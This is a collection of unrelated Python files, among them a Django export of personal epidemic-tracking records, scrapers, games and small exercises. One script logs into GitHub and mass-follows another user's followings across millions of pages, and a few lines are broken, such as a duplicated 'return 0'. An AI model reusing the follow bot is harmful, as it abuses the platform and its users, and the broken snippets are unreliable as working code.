same_sheet = bddc_result_xls.add_worksheet('镇海库中有对象导出')
different_sheet = bddc_result_xls.add_worksheet('库中无')
# 写入第一行标题
same_sheet.write_row(0, 0, ['手机号', '姓名', '身份证号', '现住地址', '工作地址', '车牌/次号', '交通工具',
'来自省', '来自市', '来自县', '返回市', '返回区', '返回镇', '返回详址', '卡口', '返回理由', '登记日期', '数据来源'])
same_sheet_row_num = 1
different_sheet_row_num = 0
# 开始导入excel模板
book = xlrd.open_workbook(path)
sheet1 = book.sheets()[0]
row_num = sheet1.nrows
for n in range(0, row_num):
cell_0_value = sheet1.cell_value(n, 0)
if sheet1.cell(n, 0).ctype == 2:
cell_0_value = str(int(cell_0_value))
cell_0_value = cell_0_value.strip()
cell_1_value = sheet1.cell_value(n, 1)
if sheet1.cell(n, 1).ctype == 2:
cell_1_value = str(int(cell_1_value))
cell_1_value = cell_1_value.strip()
kwargs = {} # 动态查询的字段
if bd_type == '1' and cell_0_value != '': # 手机号
kwargs['phone'] = cell_0_value
elif bd_type == '2' and cell_0_value != '': # 身份证号
kwargs['idCard'] = cell_0_value
elif bd_type == '3' and cell_1_value != '': # 手机第一列,姓名第二列
kwargs['phone'] = cell_0_value
kwargs['userName'] = cell_1_value
elif bd_type == '4':
pass
# 执行过滤
queryset_tmp = yqdx_fyz.objects.filter(**kwargs)
if kwargs and queryset_tmp.exists():
queryset = queryset_tmp.first()
query_set_list = [queryset.phone, queryset.userName, queryset.idCard, queryset.liveAddress,
queryset.workAddress, queryset.carNo,
queryset.carType, queryset.startAddress_provinces, queryset.startAddress_city,
queryset.startAddress_county, queryset.endAddress_city,
queryset.endAddress_county, queryset.endAddress_town, queryset.endArea, queryset.kakou,
queryset.whyGo,
queryset.createTime.strftime('%Y-%m-%d %H:%M'), queryset.from_source, ]
same_sheet.write_row(same_sheet_row_num, 0, query_set_list)
same_sheet_row_num += 1
else:
different_sheet.write_row(different_sheet_row_num, 0, sheet1.row_values(n))
different_sheet_row_num += 1
bddc_result_xls.close()
file_tmp = open(result_path, 'rb')
response = FileResponse(file_tmp)
response['Content-Type'] = 'application/vnd.ms-excel'
response['Content-Disposition'] = 'attachment;filename=' + urlquote(
'库中比对导出结果' + timestr + '.xls') # 返回下载文件的名称(activity.xls)
return response
def zzq_fyz_manager(request):
zzq_provinces_list = yqdx_zzq_provinces.objects.all()
zzq_city_list = yqdx_zzq_city.objects.all()
startAddress_provinces_list = yqdx_fyz.objects.all().values('startAddress_provinces').distinct()
startAddress_city_list = yqdx_fyz.objects.all().values('startAddress_city').distinct()
context = {"zzq_provinces_list": zzq_provinces_list, "zzq_city_list": zzq_city_list,
"startAddress_provinces_list": startAddress_provinces_list,
"startAddress_city_list": startAddress_city_list}
return render(request, "zzq_fyz.html", context)
def zzq_fyz_db(request):
zzq_provinces_list = []
zzq_city_list = []
provinces_post_list = request.POST.getlist('zzq_provinces_list')
city_post_list = request.POST.getlist('zzq_city_list')
for provinces in provinces_post_list:
zzq_provinces_list.append(yqdx_zzq_provinces(startAddress_provinces=provinces))
for city in city_post_list:
zzq_city_list.append(yqdx_zzq_city(startAddress_city=city))
# 修改前清空表
yqdx_zzq_provinces.objects.all().delete()
yqdx_zzq_city.objects.all().delete()
yqdx_zzq_city.objects.bulk_create(zzq_city_list)
yqdx_zzq_provinces.objects.bulk_create(zzq_provinces_list)
return HttpResponse('修改成功<br><a href=\'/\'>返回首页</a><br><a href=\'/zzq_fyz\'>重灾区管理</a>')
def tongji_fyz(request):
provinces_tongji_list = list()
provinces_zengzhanglv_list = list()
city_tongji_list = list()
city_zengzhanglv_list = list()
back_date = str() # 返回给前端图表
date_list = list()
zzq_provinces_list = [tmp[0] for tmp in yqdx_zzq_provinces.objects.all().values_list('startAddress_provinces')]
zzq_city_list = [tmp[0] for tmp in yqdx_zzq_city.objects.all().values_list('startAddress_city')]
back_provinces = '\'' + '\',\''.join(zzq_provinces_list) + '\'' # 形成类似'四川省','安徽省','浙江省',的格式
back_city = '\'' + '\',\''.join(zzq_city_list) + '\''
zzq_provinces_queryset = yqdx_fyz.objects.extra(
select={"createDate": "DATE_FORMAT(createTime, '%%Y-%%m-%%d')"}).filter(
startAddress_provinces__in=zzq_provinces_list).values('createDate', 'startAddress_provinces').annotate(
num=Count('createDate')).order_by('createDate')
zzq_city_queryset = yqdx_fyz.objects.extra(select={"createDate": "DATE_FORMAT(createTime, '%%Y-%%m-%%d')"}).filter(
startAddress_city__in=zzq_city_list).values('createDate', 'startAddress_city').annotate(
num=Count('createDate')).order_by('createDate')
quanguo_queryset = yqdx_fyz.objects.extra(select={"createDate": "DATE_FORMAT(createTime, '%%Y-%%m-%%d')"}).values(
'createDate').annotate(
num=Count('createDate')).order_by('createDate')
# 先获得时间数组格式的日期
now = datetime.datetime.now()
for i in range(0, 7)[::-1]:
dif_day = (now - datetime.timedelta(days=i)).strftime("%Y-%m-%d")
back_date += ("'{0}',".format(dif_day[5:]))
date_list.append(dif_day)
# 开始查询重灾区省
for zzq_provinces in zzq_provinces_list:
provinces_tmp_tongji = str()
provinces_tmp_zengzhanglv = str()
num_yestoday = 0
for date in date_list:
num_today = 0
if zzq_provinces_queryset.filter(startAddress_provinces=zzq_provinces, createDate=date).exists():
num_today = zzq_provinces_queryset.get(startAddress_provinces=zzq_provinces, createDate=date)['num']
provinces_tmp_tongji += '{0},'.format(num_today)
if num_yestoday == 0: # 被除数不能为0
provinces_tmp_zengzhanglv += '0,'
else:
provinces_tmp_zengzhanglv += '{:.2f},'.format((num_today - num_yestoday) / num_yestoday * 100) # 计算增长率
num_yestoday = num_today
provinces_tongji_list.append({'provinces': zzq_provinces, 'tongji': provinces_tmp_tongji})
provinces_zengzhanglv_list.append({'provinces': zzq_provinces, 'zengzhanglv': provinces_tmp_zengzhanglv})
# 开始查询重灾区市
for zzq_city in zzq_city_list:
city_tmp_tongji = str()
city_tmp_zengzhanglv = str()
num_yestoday = 0
for date in date_list:
num_today = 0
if zzq_city_queryset.filter(startAddress_city=zzq_city, createDate=date).exists():
num_today = zzq_city_queryset.get(startAddress_city=zzq_city, createDate=date)['num']
city_tmp_tongji += '{0},'.format(num_today)
if num_yestoday == 0: # 被除数不能为0
city_tmp_zengzhanglv += '0,'
else:
city_tmp_zengzhanglv += '{:.2f},'.format(
(num_today - num_yestoday) / num_yestoday * 100) # 计算增长率
num_yestoday = num_today
city_tongji_list.append({'city': zzq_city, 'tongji': city_tmp_tongji})
city_zengzhanglv_list.append({'city': zzq_city, 'zengzhanglv': city_tmp_zengzhanglv})
# 开始统计全国返甬
quanguo_tmp_tongji = str()
for date in date_list:
if quanguo_queryset.filter(createDate=date).exists():
quanguo_tmp_tongji += '{0},'.format(
quanguo_queryset.get(createDate=date)['num'])
else:
quanguo_tmp_tongji += '0,'
quanguo_tongji_dic = {'quanguo': '全国', 'tongji': quanguo_tmp_tongji}
return render(request, "tongji_fyz.html",
{'back_date': back_date, 'back_provinces': back_provinces, 'back_city': back_city,
'provinces_tongji_list': provinces_tongji_list,
'provinces_zengzhanglv_list': provinces_zengzhanglv_list, 'city_tongji_list': city_tongji_list,
'city_zengzhanglv_list': city_zengzhanglv_list, 'quanguo_tongji_dic': quanguo_tongji_dic})
|
#!/usr/bin/env python
"""
triarbot: Simple triangular arbitrage bot
Python 3+
(C) 2018 SurgeonY, Planet Earth
Donate ETH: 0xFA745708C435300058278631429cA910AE175d52
Donate BTC: 16KqCc4zxEWf7CaerWNZdGYwyuU33qDzCv
"""
from threading import Thread, Event
import time
import logging
from exchange_apis.exmo_api import ExmoError
from triarbstrat import tri_arb_strategy
class StrategyRunner(Thread):
def __init__(self, strategy: tri_arb_strategy.TriangularArbitrageStrategy, logger, interval: int):
Thread.__init__(self, name='TriArbRunner')
self.strategy = strategy
# TODO configure own file handler for runner
self.logger = logger.getChild('runner') if logger else logging.getLogger(__name__)
# update strategies with specified polling interval
self.interval = interval
self.shutdown_flag = Event()
def run(self):
self.logger.info('Thread #%s:%s started', self.ident, self.name)
self.strategy.start()
while not self.shutdown_flag.is_set():
# main event loop
try:
time.sleep(self.interval)
self.strategy.update()
except OSError as e:
self.logger.error('OS Error: %s', e, exc_info=1)
except ExmoError as e2:
self.logger.error('Exchange Error: %s', e2, exc_info=1)
# ... Clean shutdown code here ...
self.strategy.shutdown()
self.logger.info('Thread #%s:%s stopped', self.ident, self.name)
|
import requests
import re, lxml.html
import time, random
from excel_utils.excel_write import write_to_excel, append_to_excel
import os
res = []
# 国内所有省份url获取
start_url = 'http://www.tjcn.org/tjgb/'
header = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/89.0.4389.90 Safari/537.36'}
provinces_urls_response = requests.get(start_url, headers=header)
provinces_urls_response.encoding = 'gb2312'
# 获取所有省份网页地址
# etree = lxml.html.etree.HTML('provinces_urls_response.text')
# provinces_urls = etree.xpath('/html/body/table[6]/tbody/tr/td[1]/table[2]/tbody/tr/td/a/@href')
provinces_urls = re.findall('<a href="/tjgb/(.*?)">(\w{2,3})</a>', provinces_urls_response.text)[1:1 + 31]
# 根据上述获取的provinces_urls获取各省市年度公报链接url
base_url = start_url
print(provinces_urls)
for i in provinces_urls[18:19]:
time.sleep(random.randint(5, 10))
provinces_url = base_url + i[0]
# 不同省份城市数目不同,各年度公报数不同,这里取各省公报前40条(广东省含21省地级市,为全国最高)
buttetin_urls = [] # 各省份前40份年度公报
for page in ('', 'index_2.html'):
bulletin_urls_response = requests.get(provinces_url + page, headers=header)
bulletin_urls_response.encoding = 'gb2312'
buttetin_urls += re.findall(
'<li><a href="/tjgb/(.*?)" title="(.*?)">(?:.*?)国民经济和社会发展统计公报</a> <span>(.*?)</span></li>',
bulletin_urls_response.text)
print(buttetin_urls)
print(len(buttetin_urls))
# 根据上诉获取的各公报URL地址,获取各公报内容
for j in buttetin_urls:
time.sleep(random.randint(5, 10))
buttetin_url = start_url + j[0]
buttetin_year = re.findall('\d{4}', j[1])[0]
buttetin_province = i[1]
buttetin_city = re.split('\d{4}', j[1])[0]
buttetin_name = j[1]
buttetin_release_date = j[2]
buttetin_content_resposne = requests.get(buttetin_url, headers=header)
buttetin_content_resposne.encoding = 'gb2312'
etree = lxml.html.etree.HTML(buttetin_content_resposne.text)
buttetin_content = ''.join(etree.xpath('//td[@id="text"]//text()'))
buttetin_page = int(etree.xpath('//td[@id="text"]/div[last()]/p/a[@title="Page"]/b[last()]/text()')[0])
# 如果报告多页,进行分页爬取
if buttetin_page >= 2:
for pg in range(2, buttetin_page + 1):
next_page_url = buttetin_url[:-5] + f'_{pg}' + buttetin_url[-5:]
next_page_content_response = requests.get(next_page_url, headers=header)
next_page_content_response.encoding = 'gb2312'
buttetin_content += ''.join(
lxml.html.etree.HTML(next_page_content_response.text).xpath('//td[@id="text"]//text()'))
print(f'正在爬取{buttetin_name}第{pg}页')
print(f'page:{buttetin_page}')
print(f'年度:{buttetin_year}')
print(f'省份:{buttetin_province}')
print(f'城市:{buttetin_city}')
print(f'报告名字:{buttetin_name}')
print(f'报告内容:{buttetin_content}')
print(f'报告链接:{buttetin_url}')
print(f'发布日期:{buttetin_release_date}')
print('-------------------------------------------------------------------')
res.append({'年度': buttetin_year, '省份': buttetin_province, '城市': buttetin_city, '报告名字': buttetin_name,
'报告链接': buttetin_url, '发布日期': buttetin_release_date, '报告内容': buttetin_content})
# 写入excel表格
fileName = '公报爬取测试数据.xls'
if not os.path.exists(fileName):
write_to_excel(res, fileName)
else:
append_to_excel(res, fileName)
|
from isis.dialog_search_text import Dialog_Search_Text, Data_Table_Model
from sarah.acp_bson import Client
class Search_Account(Dialog_Search_Text):
def __init__(self, parent=None):
Dialog_Search_Text.__init__(self, parent)
self.agent_caroline = None
def searching(self, e):
if self.agent_caroline is None:
self.agent_caroline = Client('isis.caroline.search_account', 'caroline')
msg = {'type_message': 'find', 'type': 'caroline/account', 'query': {'name': {'!like': e['text']}}}
answer = self.agent_caroline.send_msg(msg)
e['list'] = answer['result']
table = Data_Table_Model()
e['table'] = table
table.columns.add('id', str)
table.columns.add('type', str)
table.columns.add('account_type', str)
table.columns.add('name', str)
for account in e['list']:
row = table.newrow()
if 'id' in account:
row['id'] = account['id']
if 'type' in account:
row['type'] = account['type']
if 'account_type' in account:
row['account_type'] = account['account_type']
if 'name' in account:
row['name'] = account['name']
|
_base_ = 'mask-rcnn_regnetx-3.2GF_fpn_1x_coco.py'
model = dict(
backbone=dict(
dcn=dict(type='DCNv2', deform_groups=1, fallback_on_stride=False),
stage_with_dcn=(False, True, True, True),
init_cfg=dict(
type='Pretrained', checkpoint='open-mmlab://regnetx_3.2gf')))
|
__author__ = 'kic'
thread_create_response = {
"code": "",
"response": {
"date": "",
"forum": "",
"id": "",
"isClosed": "",
"isDeleted": "",
"message": "",
"slug": "",
"title": "",
"user": ""
}
}
|
import logging
from typing import Union
import virtool.errors
import virtool.http.proxy
import virtool.utils
logger = logging.getLogger(__name__)
BASE_URL = "https://api.github.com/repos"
EXCLUDED_UPDATE_FIELDS = (
"content_type",
"download_url",
"etag",
"retrieved_at"
)
HEADERS = {
"Accept": "application/vnd.github.v3+json"
}
def create_update_subdocument(release, ready, user_id, created_at=None):
update = {k: release[k] for k in release if k not in EXCLUDED_UPDATE_FIELDS}
return {
**update,
"created_at": created_at or virtool.utils.timestamp(),
"ready": ready,
"user": {
"id": user_id
}
}
def format_release(release: dict) -> dict:
"""
Format a raw release record from GitHub into a release usable by Virtool.
:param release: the GitHub release record
:return: a release for use within Virtool
"""
asset = release["assets"][0]
return {
"id": release["id"],
"name": release["name"],
"body": release["body"],
"etag": release["etag"],
"filename": asset["name"],
"size": asset["size"],
"html_url": release["html_url"],
"download_url": asset["browser_download_url"],
"published_at": release["published_at"],
"content_type": asset["content_type"]
}
def get_etag(release: Union[None, dict]) -> Union[None, str]:
"""
Get the ETag from a release dict. Return `None` when the key is missing or the input is not a `dict`.
:param release: a release
:return: an ETag or `None`
"""
try:
return release["etag"]
except (KeyError, TypeError):
return None
async def get_release(settings, session, slug, etag=None, release_id="latest"):
"""
GET data from a GitHub API url.
:param settings: the application settings object
:type settings: :class:`virtool.app_settings.Settings`
:param session: the application HTTP client session
:type session: :class:`aiohttp.ClientSession`
:param slug: the slug for the GitHub repo
:type slug: str
:param etag: an ETag for the resource to be used with the `If-None-Match` header
:type etag: Union[None, str]
:param release_id: the id of the GitHub release to get
:type release_id: Union[int,str]
:return: the latest release
:rtype: Coroutine[dict]
"""
url = f"{BASE_URL}/{slug}/releases/{release_id}"
headers = dict(HEADERS)
if etag:
headers["If-None-Match"] = etag
async with virtool.http.proxy.ProxyRequest(settings, session.get, url, headers=headers) as resp:
rate_limit_remaining = resp.headers.get("X-RateLimit-Remaining", "00")
rate_limit = resp.headers.get("X-RateLimit-Limit", "00")
logger.debug(f"Fetched release: {slug}/{release_id} ({resp.status} - {rate_limit_remaining}/{rate_limit})")
if resp.status == 200:
data = await resp.json()
if len(data["assets"]) == 0:
return None
return dict(data, etag=resp.headers["etag"])
elif resp.status == 304:
return None
else:
raise virtool.errors.GitHubError(f"Encountered error {resp.status}")
|
import os
import sys
import pygame
import requests
map_file = None
spn_number = [0.01, 0.02, 0.03, 0.05, 0.09, 0.18, 0.35, 0.7, 1.4, 2.8, 5.6, 11.1, 21.65, 40]
spn_count = 0
spn = 0.01
def draw():
global map_file
map_params = {
"ll": "37.530887,55.703118",
"spn": str(spn) + ',' + str(spn),
"l": "map"
}
map_api_server = "http://static-maps.yandex.ru/1.x/"
# ... и выполняем запрос
response = requests.get(map_api_server, params=map_params)
if not response:
print("Ошибка выполнения запроса:")
print(map_api_server)
print("Http статус:", response.status_code, "(", response.reason, ")")
sys.exit(1)
# Запишем полученное изображение в файл.
map_file = "map.png"
with open(map_file, "wb") as file:
file.write(response.content)
draw()
# Инициализируем pygame
pygame.init()
screen = pygame.display.set_mode((600, 450))
# Рисуем картинку, загружаемую из только что созданного файла.
screen.blit(pygame.image.load(map_file), (0, 0))
# Переключаем экран и ждем закрытия окна.
running = True
while running:
for event in pygame.event.get():
# при закрытии окна
if event.type == pygame.QUIT:
running = False
if event.type == pygame.KEYDOWN:
if event.type == pygame.K_PAGEUP or event.key == pygame.K_UP:
os.remove(map_file)
if spn_count + 1 != len(spn_number):
spn_count += 1
spn = spn_number[spn_count]
draw()
if event.type == pygame.K_PAGEDOWN or event.key == pygame.K_DOWN:
os.remove(map_file)
if spn_count > 0:
spn_count -= 1
spn = spn_number[spn_count]
draw()
screen.blit(pygame.image.load(map_file), (0, 0))
pygame.display.flip()
pygame.quit()
# Удаляем за собой файл с изображением.
os.remove(map_file) |
s = input("string de entrada: ")
sv = ""
for i in range(len(s)):
if(s[i] != "a" and s[i] != "A"):
sv = sv + s[i]
print(sv)
|
#!/usr/bin/env python
# encoding: utf-8
# package
'''
@author: yuxiqian
@license: MIT
@contact: akaza_akari@sjtu.edu.cn
@software: electsys-api
@file: /interface/__init__.py
@time: 2019/1/9
'''
from .interface import *
__all__ = ['ElectCourse', 'PersonalCourse',
'PersonalExam', 'PersonalScore', 'CourseDetail']
|
# Generated by Django 3.0.5 on 2020-09-16 15:03
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('core', '0002_pokemon_xp'),
]
operations = [
migrations.AddField(
model_name='pokemonteam',
name='trainer',
field=models.ManyToManyField(related_name='trainer_pokemon', to=settings.AUTH_USER_MODEL),
),
]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2020/6/11 6:05 下午
# @Author : Johny Zheng
# @Site :
# @File : autoAddFollower.py
# @Software: PyCharm
# Running based on python3.6.2 environment
from github import Github
import requests
import logging
import re
import base64
import config
class InitLogin(config.Base):
def __init__(self):
super().__init__()
self.g = Github(self.apiUrl, self.user, self.password)
class InitCrawler(config.Base):
def __init__(self, someone, page):
super().__init__()
self.baseUrls = self.baseUrl + someone
self.followingQueryString = {"page": page, "tab": "following", "_pjax": "#js-pjax-container"}
self.followerQueryString = {"page": page, "tab": "followers", "_pjax": "#js-pjax-container"}
self.cookies = GithubLogin().get_cookies()
self.header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'
}
class GithubLogin(config.Base):
def __init__(self):
super().__init__()
self.headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) '
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
'Referer': 'https://github.com/',
'Host': 'github.com'
}
self.session = requests.Session()
self.login_url = 'https://github.com/login'
self.post_url = 'https://github.com/session'
def login_github(self):
# 登录入口
post_data = {
'commit': 'Sign in',
'utf8': '✓',
'authenticity_token': self.get_token(),
'login': self.email,
'password': self.password
}
resp = self.session.post(
self.post_url, data=post_data, headers=self.headers)
logging.debug('StatusCode:', resp.status_code)
if resp.status_code != 200:
logging.error('Login Fail')
match = re.search(r'"user-login" content="(.*?)"', resp.text)
user_name = match.group(1)
logging.debug('UserName:', user_name)
# Get login token
def get_token(self):
response = self.session.get(self.login_url, headers=self.headers)
if response.status_code != 200:
logging.error('Get token fail')
return None
match = re.search(
r'name="authenticity_token" value="(.*?)"', response.text)
if not match:
logging.error('Get Token Fail')
return None
return match.group(1)
# Get login cookies
def get_cookies(self):
response = self.session.get(self.login_url, headers=self.headers, timeout=120, allow_redirects=False)
# keep cookie update
if response.cookies.get_dict():
self.session.cookies.update(response.cookies)
logging.debug('自动更新cookie成功: %s' % response.cookies)
# 根据location 获取的token去拿response cookie 并将CookieJar转为字典
try:
cookies = requests.utils.dict_from_cookiejar(response.cookies)
logging.debug('获取cookie成功: %s' % cookies)
return cookies
except Exception as e:
logging.error(f'获取cookie失败{e}')
finally:
response.cookies.clear()
class GetSomeoneInfo(InitCrawler):
def __init__(self, someone, page):
super().__init__(someone, page)
def get_followings(self):
following_raw = requests.get(self.baseUrls, cookies=self.cookies, headers=self.header, timeout=120,
params=self.followingQueryString).content
# print(following_raw)
pattern = re.compile(rb'link-gray">(.*)<')
following = pattern.findall(following_raw)
following = [i.decode('utf8') for i in following]
return following
def get_followers(self):
follower_raw = requests.get(self.baseUrls, cookies=self.cookies, headers=self.header, timeout=120,
params=self.followerQueryString).content
pattern = re.compile(rb'link-gray pl-1">(.*)<')
follower = pattern.findall(follower_raw)
follower = [i.decode('utf8') for i in follower]
return follower
class AutoAddFollowing(InitLogin):
def __init__(self):
super().__init__()
self.credentials = base64.b64encode(f"{self.email}:{self.password}".encode()).decode()
self.nicknames = []
self.nickname = ""
self.header = {
'Authorization': "Basic {}".format(self.credentials),
}
def get_followers(self):
for follower in self.g.get_user().get_followers():
self.nickname = follower.login
self.nicknames.append(self.nickname)
return self.nicknames
def get_following(self):
for following in self.g.get_user().get_following():
self.nickname = following.login
self.nicknames.append(self.nickname)
return self.nicknames
def add_following(self, follow_user):
# payload = {'username': follow_user}
r = requests.put(self.apiUrl + f"/user/following/{follow_user}", headers=self.header)
logging.debug(r.status_code)
logging.debug(r.content)
return r.status_code
if __name__ == '__main__':
login = GithubLogin()
login.login_github()
logging.info("login github ok")
c = login.get_cookies()
t = login.get_token()
# print(cr)
# print(login.get_token())
# print(login.get_cookies())
# print(config.Base().password)
if config.Base().exceeded:
exist_list = GetSomeoneInfo(config.Base().user, 1).get_followings()
else:
exist_list = AutoAddFollowing().get_following()
logging.info(f"exist_list: {exist_list}")
for p in range(2, 10000000):
logging.info(f"page: {p}")
user_list = GetSomeoneInfo(config.Base().sourceUser, p).get_followings()
logging.info(f"user_list: {user_list}")
need_followings = list(set(user_list)-set(exist_list))
logging.info(f"need_followings: {need_followings}")
if need_followings:
for u in need_followings:
AutoAddFollowing().add_following(u)
logging.info(f"AutoAddFollowing: {u}")
|
from typing import *
def repostaje(N: int, d: List[int]) -> List[int]:
res = [0]
km = N
for i, gdist in enumerate(d):
if gdist > km:
res.append(i)
km = N
km -= gdist
res.append(len(d))
return res
print(repostaje(150, [130, 23, 45, 62, 12, 110, 130]))
|
import time
import os
import argparse
import sys
import datetime
import platform
from libnyumaya import AudioRecognition
from libnyumaya import SpeakerVerification
if platform.system() == "Darwin":
from cross_record import AudiostreamSource
else:
from record import AudiostreamSource
fingerprints=[]
enrolling = 5
def get_averaged_fingerprint():
if len(fingerprints) == 0:
return None
C=[]
for i in range(len(fingerprints[0])):
val = 0
for f in range(len(fingerprints)):
val += fingerprints[f][i]
val /= len(fingerprints)
C.append(val)
return C
import math
def cosine_similarity(v1,v2):
sumxx, sumxy, sumyy = 0, 0, 0
for i in range(len(v1)):
x = v1[i]; y = v2[i]
sumxx += x*x
sumyy += y*y
sumxy += x*y
return sumxy/math.sqrt(sumxx*sumyy)
#Enrolling:
#Capture 5 samples of word
#Do some kind of averaging
#Store Name and Vector in file
def label_stream(labels,libpath,verification_path ,graph,sensitivity):
last_frames=[]
#Keyword spotting has 200ms frames, Verifiyer takes 2 seconds of audio
max_last_frames = 10
audio_stream = AudiostreamSource()
detector = AudioRecognition(libpath,graph,labels)
verifiyer = SpeakerVerification(libpath,verification_path)
detector.SetSensitivity(sensitivity)
detector.SetGain(1)
detector.RemoveDC(False)
bufsize = detector.GetInputDataSize()
print("Bufsize: " + str(bufsize))
play_command = "play -q" if platform.system() == "Darwin" else "aplay"
print("Audio Recognition Version: " + detector.GetVersionString())
print("WARNING EXPERIMENTAL: The voice verification module can be use to verify if")
print("A command is issued by a certian speaker. It processes speech signals with a")
print("two second length. This experimental version isn't very good yet.")
print("\n\n During enrolling a fingerprint of your voice is caputred. By default 5 samples")
print("Will be captured and averaged. The progam will output a similarity score between 0 and 1")
print("A value of 1 means totally similar, 0 means different.")
print("Currently a threshold of 0.95 seems good")
print("This module should not be run on a Pi Zero, as it uses excessive CPU")
print("Verification can also be helpful to reduce false positives of non speech signals")
audio_stream.start()
try:
while(True):
frame = audio_stream.read(bufsize,bufsize)
if(not frame):
time.sleep(0.01)
continue
last_frames.append(frame)
if len(last_frames) > max_last_frames:
last_frames.pop(0)
prediction = detector.RunDetection(frame)
if(prediction):
now = datetime.datetime.now().strftime("%d.%b %Y %H:%M:%S")
print(detector.GetPredictionLabel(prediction) + " " + now)
os.system(play_command + " ./ding.wav")
detect_frame = bytearray()
for element in last_frames:
detect_frame.extend(element)
print("Running Verification")
features = verifiyer.VerifySpeaker(detect_frame)
if(len(fingerprints) < enrolling):
print("Enrolling")
fingerprints.append(features)
else:
print("Completed")
print(features)
avg_fingerprint = get_averaged_fingerprint()
if(avg_fingerprint):
similarity_score = cosine_similarity(features,avg_fingerprint)
print("Similarity: " + str(similarity_score))
print("Verification Done")
except KeyboardInterrupt:
print("Terminating")
audio_stream.stop()
sys.exit(0)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--graph', type=str,
default='../models/Hotword/marvin_small.tflite',
help='Model to use for identification.')
parser.add_argument(
'--verification_path', type=str,
default='../models/Experimental/Verification/s-recog.tflite',
help='Model to use for verification.')
parser.add_argument(
'--libpath', type=str,
default='../lib/linux/libnyumaya.so',
help='Path to Platform specific nyumaya_lib.')
parser.add_argument(
'--labels', type=str,
default='../models/Hotword/marvin_labels.txt',
help='Path to file containing labels.')
parser.add_argument(
'--sens', type=float,
default='0.5',
help='Sensitivity for detection')
FLAGS, unparsed = parser.parse_known_args()
label_stream(FLAGS.labels,FLAGS.libpath,FLAGS.verification_path, FLAGS.graph, FLAGS.sens)
|
class Solution:
def largestPerimeter(self, A):
A.sort(reverse=True)
for a , b , c in zip(A, A[1:], A[2:]):
if b + c > a:
return a + b + c
return 0 return 0
|
import pygame
from Character import Character
pygame.init()
screen = pygame.display.set_mode([2000, 1200])
c1 = Character(1000, [10-20])
c2 = Character(1100, [8-18])
running = True
while running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
running = False
screen.fill((255, 255, 255))
c1.get_damage(1)
c2.get_damage(2)
pygame.draw.circle(screen, (0, 0, 255), (1000, 600), 75)
pygame.draw.rect(screen, (100, 100, 100), (400, 100, 100, 1000), 0)
pygame.draw.rect(screen, (100, 100, 100), (1500, 100, 100, 1000), 0)
pygame.draw.rect(screen, (0, 255, 255), (400, 100 + int(1000 * (1-c1.life_percent())), 100, int(1000*c1.life_percent())), 0)
pygame.draw.rect(screen, (0, 255, 0), (1500, 100 + int(1000 * (1-c2.life_percent())), 100, int(1000*c2.life_percent())), 0)
pygame.display.flip()
pygame.quit() |
import sys
import random
import string
import hashlib
import argparse
def proof_of_work(prototype, level=1, verbose=False):
if not prototype:
prototype = random_prototype()
count = 0
while True:
for y in range(0, 256):
for x in range(0, 256):
h = hashlib.sha256(b'{0}{1}'.format(prototype, chr(x))).hexdigest()
count += 1
if verbose:
print("Try: {0} - {1}".format(count, h))
if h[0:level] == ('0' * level):
print("Coin costed {0} tests.".format(count))
return
prototype = "{0}{1}".format(prototype, chr(y))
def random_prototype():
return ''.join([random.choice(string.ascii_letters) for n in xrange(16)])
def parse():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--prototype", help="Prototype string to test")
parser.add_argument("-l", "--level", help="Level of difficulty", type=int, default=1)
parser.add_argument("-v", "--verbose", action="store_true")
return parser.parse_args()
if __name__ == "__main__":
args = parse()
proof_of_work(args.prototype, args.level, args.verbose)
|
import tkinter as tk
from tkinter import filedialog
from PIL import Image
root = tk.Tk()
canvas1 = tk.Canvas(root, width=300, height=250, bg='azure3', relief='raised')
canvas1.pack()
label1 = tk.Label(root, text="Image Converter", bg='azure3')
label1.config(font=('helvetica', 20))
canvas1.create_window(150, 60, window=label1)
def getPNG():
global im1
import_file_path = filedialog.askopenfilename()
im1 = Image.open(import_file_path)
browse_png = tk.Button(text="Select PNG file", command=getPNG, bg="royalblue", fg='white', font=('helvetica', 12, 'bold'))
canvas1.create_window(150, 130, window=browse_png)
def convert():
global im1
export_file_path = filedialog.asksaveasfilename(defaultextension='.jpg')
im1.save(export_file_path)
saveasbutton = tk.Button(text="Convert PNG to JPG", command=convert, bg='royalblue', fg='white', font=('helvetica', 12, 'bold'))
canvas1.create_window(150, 180, window=saveasbutton)
root.mainloop() |
from skdecide.builders.discrete_optimization.generic_tools.result_storage.result_storage import ResultStorage, result_storage_to_pareto_front
from typing import List, Tuple, Dict, Union, Set, Any, Optional
from skdecide.builders.discrete_optimization.generic_tools.do_problem import Problem
from skdecide.builders.discrete_optimization.generic_tools.result_storage.result_storage import ParetoFront, plot_pareto_2d, plot_storage_2d
import matplotlib.pyplot as plt
import seaborn as sns
import matplotlib.cm as cm
import numpy as np
import math
class ResultComparator:
list_result_storage: List[ResultStorage]
result_storage_names: List[str]
objectives_str: List[str]
objective_weights: List[int]
test_problems: List[Problem]
super_pareto: ResultStorage
# If test problem is None, then we use the fitnesses from the ResultStorage
def __init__(self, list_result_storage: List[ResultStorage],
result_storage_names: List[str],
objectives_str: List[str],
objective_weights: List[int],
test_problems=None):
self.list_result_storage = list_result_storage
self.result_storage_names = result_storage_names
self.objectives_str = objectives_str
self.objective_weights = objective_weights
self.test_problems = test_problems
self.reevaluated_results = {}
if self.test_problems is not None:
self.reevaluate_result_storages()
def reevaluate_result_storages(self):
for res in self.list_result_storage:
self.reevaluated_results[self.list_result_storage.index(res)] = {}
for obj in self.objectives_str:
self.reevaluated_results[self.list_result_storage.index(res)][obj] = []
for scenario in self.test_problems:
# res.list_solution_fits[0][0].change_problem(scenario)
# val = scenario.evaluate(res.list_solution_fits[0][0])[obj]
res.get_best_solution().change_problem(scenario)
val = scenario.evaluate(res.get_best_solution())[obj]
